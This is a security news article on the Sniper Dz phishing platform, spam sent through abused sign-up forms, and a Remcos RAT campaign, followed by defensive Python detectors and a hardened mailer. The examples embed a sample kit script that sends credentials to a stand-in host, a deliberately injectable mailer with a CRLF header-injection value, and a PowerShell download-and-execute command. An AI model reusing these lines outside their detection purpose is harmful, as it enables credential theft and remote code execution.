
Free Sniper Dz Phishing Tools Fuel 140,000+ Cyber Attacks Targeting User Credentials


140,000+ Cyber Attacks

More than 140,000 phishing websites have been found linked to a phishing-as-a-service (PhaaS) platform named Sniper Dz over the past year, indicating that it’s being used by a large number of cybercriminals to conduct credential theft.

“For prospective phishers, Sniper Dz offers an online admin panel with a catalog of phishing pages,” Palo Alto Networks Unit 42 researchers Shehroze Farooqi, Howard Tong, and Alex Starov said in a technical report.

“Phishers can either host these phishing pages on Sniper Dz-owned infrastructure or download Sniper Dz phishing templates to host on their own servers.”

What makes the platform even more attractive is that these services are free. The catch is that credentials harvested through the phishing sites are also exfiltrated to the operators of the PhaaS platform, a practice Microsoft calls double theft.

PhaaS platforms have become an increasingly common way for aspiring threat actors to enter the world of cybercrime, allowing even those with little technical expertise to mount phishing attacks at scale.

Such phishing kits can be bought on Telegram, where dedicated channels and groups cater to every stage of the attack chain, from hosting services to sending the phishing messages.


Sniper Dz is no exception in that the threat actors operate a Telegram channel with over 7,170 subscribers as of October 1, 2024. The channel was created on May 25, 2020.

Interestingly, a day after the Unit 42 report went live, the channel's operators enabled the auto-delete option, which clears all posts after one month. This suggests an attempt to cover their tracks, although earlier messages remain intact in the chat history.

The PhaaS platform is accessible on the clearnet and requires signing up an account to “get your scams and hack tools,” according to the website’s home page.

A video uploaded to Vimeo in January 2021 shows that the service offers ready-to-use scam templates for various online sites like X, Facebook, Instagram, Skype, Yahoo, Netflix, Steam, Snapchat, and PayPal in English, Arabic, and French languages. The video has more than 67,000 views to date.

The Hacker News has also identified tutorial videos uploaded to YouTube that take viewers through the different steps required to download templates from Sniper Dz and set up fake landing pages for PUBG and Free Fire on legitimate platforms like Google Blogger.

However, it’s not clear if they have any connection to the developers of Sniper Dz, or if they are just customers of the service.

Sniper Dz can host phishing pages on its own infrastructure and hand out bespoke links pointing to them. Those pages are then placed behind a legitimate proxy service (proxymesh[.]com) to hinder detection.

“The group behind Sniper Dz configures this proxy server to automatically load phishing content from its own server without direct communications,” the researchers said.

“This technique can help Sniper Dz to protect its backend servers, since the victim’s browser or a security crawler will see the proxy server as being responsible for loading the phishing payload.”

The other option is to download the phishing page templates as HTML files and host them on servers the phisher controls. Sniper Dz also provides tools that convert the templates to the Blogger format so they can be hosted on Blogspot domains.

The stolen credentials are ultimately displayed on an admin panel that can be accessed by logging into the clearnet site. Unit 42 said it observed a surge in phishing activity using Sniper Dz, primarily targeting web users in the U.S., starting in July 2024.

“Sniper Dz phishing pages exfiltrate victim credentials and track them through a centralized infrastructure,” the researchers said. “This could be helping Sniper Dz collect victim credentials stolen by phishers who use their PhaaS platform.”
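The double-theft behaviour described here (and in the earlier note about credentials also flowing to the platform operators) is something a defender can check for whenever a kit template is recovered. The following is an added example, not Sniper Dz code or Unit 42's tooling: it parses a downloaded template, collects the form's action URL and every URL that in-page JavaScript sends data to, and flags the template when submitted fields can reach more than one host. The kit HTML and the host names in it (phisher-panel.example, tracker.example, cdn.example) are constructed for the example.

```python
"""Find every host a phishing-kit template can deliver credentials to.

Added example, not Sniper Dz code or Unit 42 tooling. SAMPLE_KIT_HTML is a
hand-constructed template showing the "double theft" layout: the form posts
to the phisher's collector, and a script copies the same fields to a second
host that the phisher did not choose. All host names are made up.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SAMPLE_KIT_HTML = """<html><body>
<form id="login" method="POST" action="https://phisher-panel.example/login.php">
  <input name="email"><input name="password" type="password">
</form>
<img src="https://cdn.example/logo.png">
<script>
document.getElementById('login').addEventListener('submit', function () {
  var f = new FormData(this);
  navigator.sendBeacon('https://tracker.example/collect', f);
  fetch("https://tracker.example/log?u=" + encodeURIComponent(f.get('email')));
});
</script>
</body></html>"""

# JavaScript constructs that transmit data, with the destination URL captured.
SEND_PATTERNS = [
    # fetch("https://...") and navigator.sendBeacon("https://...")
    re.compile(r"""(?:fetch|sendBeacon)\s*\(\s*['"](https?://[^'"]+)"""),
    # xhr.open("POST", "https://...")
    re.compile(r"""\.open\s*\(\s*['"][A-Za-z]+['"]\s*,\s*['"](https?://[^'"]+)"""),
    # new Image().src = "https://..."  (beacon disguised as an image request)
    re.compile(r"""\.src\s*=\s*['"](https?://[^'"]+)"""),
]


class _KitParser(HTMLParser):
    """Collects <form action> values and the text of every <script> block."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form" and attrs.get("action"):
            self.form_actions.append(attrs["action"])
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def exfil_hosts(template_html):
    """Map each host that can receive submitted data to the URLs pointing at it.

    Form actions count directly; a relative action is recorded as the page's
    own origin. Inside scripts only sending calls count, so static assets
    such as the logo image are ignored.
    """
    parser = _KitParser()
    parser.feed(template_html)
    hosts = {}
    for action in parser.form_actions:
        hosts.setdefault(urlparse(action).hostname or "(same-origin)", []).append(action)
    for body in parser.scripts:
        for pattern in SEND_PATTERNS:
            for url in pattern.findall(body):
                hosts.setdefault(urlparse(url).hostname, []).append(url)
    return hosts


def is_double_theft(template_html):
    """True when submitted fields can reach more than one distinct host."""
    return len(exfil_hosts(template_html)) > 1


if __name__ == "__main__":
    for host, urls in exfil_hosts(SAMPLE_KIT_HTML).items():
        print(host, urls)
    print("double theft:", is_double_theft(SAMPLE_KIT_HTML))
```

Run it against each HTML file in a recovered kit; a second host that appears in several templates, but never as the form action, is the platform-level collector. Obfuscated scripts will defeat the regexes, so treat a clean result as "nothing obvious", not as proof of a single recipient.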

The development comes as Cisco Talos revealed that attackers are abusing web pages wired to backend SMTP infrastructure, such as account-creation forms and other pages that trigger an email back to the user, to bypass spam filters and distribute phishing emails.

These attacks take advantage of the weak input validation and sanitization common on such web forms to plant malicious links and text in the generated emails. Other campaigns run credential stuffing attacks against the mail servers of legitimate organizations to take over email accounts and send spam from them.

“Many websites allow users to sign up for an account and log in to access specific features or content,” Talos researcher Jaeson Schultz said. “Typically, upon successful user registration, an email is triggered back to the user to confirm the account.”

“In this case, the spammers have overloaded the name field with text and a link, which is unfortunately not validated or sanitized in any way. The resulting email back to the victim contains the spammer’s link.”
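The Talos finding is a plain input-handling bug, so here is an added example (not Talos code, nor code from any affected site) of a registration-confirmation mailer written the injectable way beside a hardened one. The site, addresses and the spam submission are constructed. The vulnerable version reflects the raw name into a header and the HTML body; the hardened version rejects control characters, URL- and domain-shaped tokens and overlong input, keeps the name out of headers entirely, and HTML-escapes it in the body.

```python
"""Registration confirmation mailer: the injectable form beside a hardened one.

Added example, not Talos code or code from an affected site. SPAM_NAME is a
constructed submission of the kind Talos describes: text plus a link stuffed
into the "name" field, with a CRLF added to show that the same field also
reaches message headers. All addresses and hosts are made up.
"""
import html
import re

SPAM_NAME = ("URGENT: your parcel is held, claim it at "
             "https://spam.example/claim\r\nBcc: other-victim@example.net")

NAME_MAX = 64
# http(s) URLs, www. prefixes, and domain-shaped tokens such as spam.example
DOMAIN_LIKE = re.compile(r"https?://|www\.|\S\.[a-z]{2,}", re.IGNORECASE)


def render_confirmation_vulnerable(name, to_addr):
    """Builds the message by string concatenation and trusts the name.

    The name lands in the Subject header (so a CRLF injects headers) and in
    the HTML body (so links and markup are delivered verbatim).
    """
    return ("To: " + to_addr + "\r\n"
            + "Subject: Welcome, " + name + "!\r\n"
            + "Content-Type: text/html; charset=utf-8\r\n\r\n"
            + "<p>Hi " + name + ", thanks for registering.</p>\r\n")


def validate_name(name):
    """Return the trimmed name, or raise ValueError for spam-shaped input."""
    if not isinstance(name, str):
        raise ValueError("name must be a string")
    name = name.strip()
    if not 1 <= len(name) <= NAME_MAX:
        raise ValueError("name must be 1-%d characters" % NAME_MAX)
    if any(ord(c) < 32 or ord(c) == 127 for c in name):
        raise ValueError("control characters (CR, LF, NUL, ...) are not allowed")
    if DOMAIN_LIKE.search(name):
        raise ValueError("links and domain names are not allowed in a name")
    return name


def is_acceptable_name(name):
    """Boolean form of validate_name for callers that only need accept/reject."""
    try:
        validate_name(name)
        return True
    except ValueError:
        return False


def render_confirmation_hardened(name, to_addr):
    """Validates the name, keeps it out of headers, and escapes it in the body."""
    safe = html.escape(validate_name(name), quote=True)
    return ("To: " + to_addr + "\r\n"
            + "Subject: Confirm your account\r\n"
            + "Content-Type: text/html; charset=utf-8\r\n\r\n"
            + "<p>Hi " + safe + ", thanks for registering.</p>\r\n")


if __name__ == "__main__":
    print(render_confirmation_vulnerable(SPAM_NAME, "victim@example.net"))
    print("spam name accepted by hardened path:", is_acceptable_name(SPAM_NAME))
    print(render_confirmation_hardened("Jane O'Brien", "victim@example.net"))
```

The domain check rejects a few legitimate names (anything with a dot followed by two or more letters), which is the right trade-off for a field that ends up in outbound mail; a rejected name should surface as a form error, not trigger a send. The recipient address needs its own validation as well, and a real mailer should build the message with a library that refuses newlines in header values rather than by concatenation.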

It also follows the discovery of a new email phishing campaign that leverages a seemingly harmless Microsoft Excel document to propagate a fileless variant of Remcos RAT by exploiting a known security flaw (CVE-2017-0199).

“Upon opening the [Excel] file, OLE objects are used to trigger the download and execution of a malicious HTA application,” Trellix researcher Trishaan Kalra said. “This HTA application subsequently launches a chain of PowerShell commands that culminate in the injection of a fileless Remcos RAT into a legitimate Windows process.”
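The Excel-to-HTA-to-PowerShell chain is visible in process-creation telemetry no matter how the final payload is staged in memory. Below is an added example, not Trellix code, of that detection run over a handful of constructed Sysmon-style process-creation records (the PIDs, paths, the 203.0.113.10 address and the command lines are all made up): it walks each shell process's ancestry and reports a hit when an Office application is an ancestor, noting whether a script host such as mshta.exe sits in between.

```python
"""Flag PowerShell/cmd processes whose ancestry runs back to an Office app.

Added example, not Trellix code. SAMPLE_EVENTS are constructed Sysmon-style
process-creation records for one host: a benign explorer -> cmd -> powershell
chain and the Excel -> mshta -> powershell chain the article describes. The
PIDs, paths, 203.0.113.10 address and command lines are all made up.
"""
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    {"pid": 4100, "ppid": 100,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmd": '"EXCEL.EXE" C:\\Users\\jdoe\\Downloads\\invoice.xlsx'},
    {"pid": 4188, "ppid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe http://203.0.113.10/update.hta"},
    {"pid": 4220, "ppid": 4188,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object "
            "Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')\""},
    {"pid": 5000, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe"},
    {"pid": 5010, "ppid": 5000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Get-Date"},
]


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_office_spawned_shells(events, max_depth=4):
    """Return a hit for each shell whose ancestry (within max_depth hops)
    reaches an Office application.

    Each hit records the chain from the shell up to the Office app and
    whether a script host such as mshta.exe sits between them, which is the
    OLE -> HTA -> PowerShell shape described in the text. A shell spawned by
    Office directly is still reported, with via_script_host set to False.
    """
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for event in events:
        if image_name(event["image"]) not in SHELLS:
            continue
        names = [image_name(event["image"])]
        current = event
        for _ in range(max_depth):
            current = by_pid.get(current["ppid"])
            if current is None:          # parent not in this batch of events
                break
            names.append(image_name(current["image"]))
        office_idx = next((i for i, n in enumerate(names) if n in OFFICE_APPS), None)
        if office_idx is None:
            continue
        chain = names[:office_idx + 1]
        hits.append({
            "pid": event["pid"],
            "chain": " <- ".join(chain),
            "via_script_host": any(n in SCRIPT_HOSTS for n in chain[1:-1]),
            "cmd": event["cmd"],
        })
    return hits


if __name__ == "__main__":
    for hit in find_office_spawned_shells(SAMPLE_EVENTS):
        print(hit["pid"], hit["chain"], "via script host:", hit["via_script_host"])
        print("   ", hit["cmd"])
```

This is the process-tree half of the detection; the HTA fetched from the network and the OLE object inside the spreadsheet are separate signals worth correlating with the hit. Expect a low baseline of legitimate Office-spawned shells from add-ins, which is why the chain and command line are returned rather than just a boolean.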


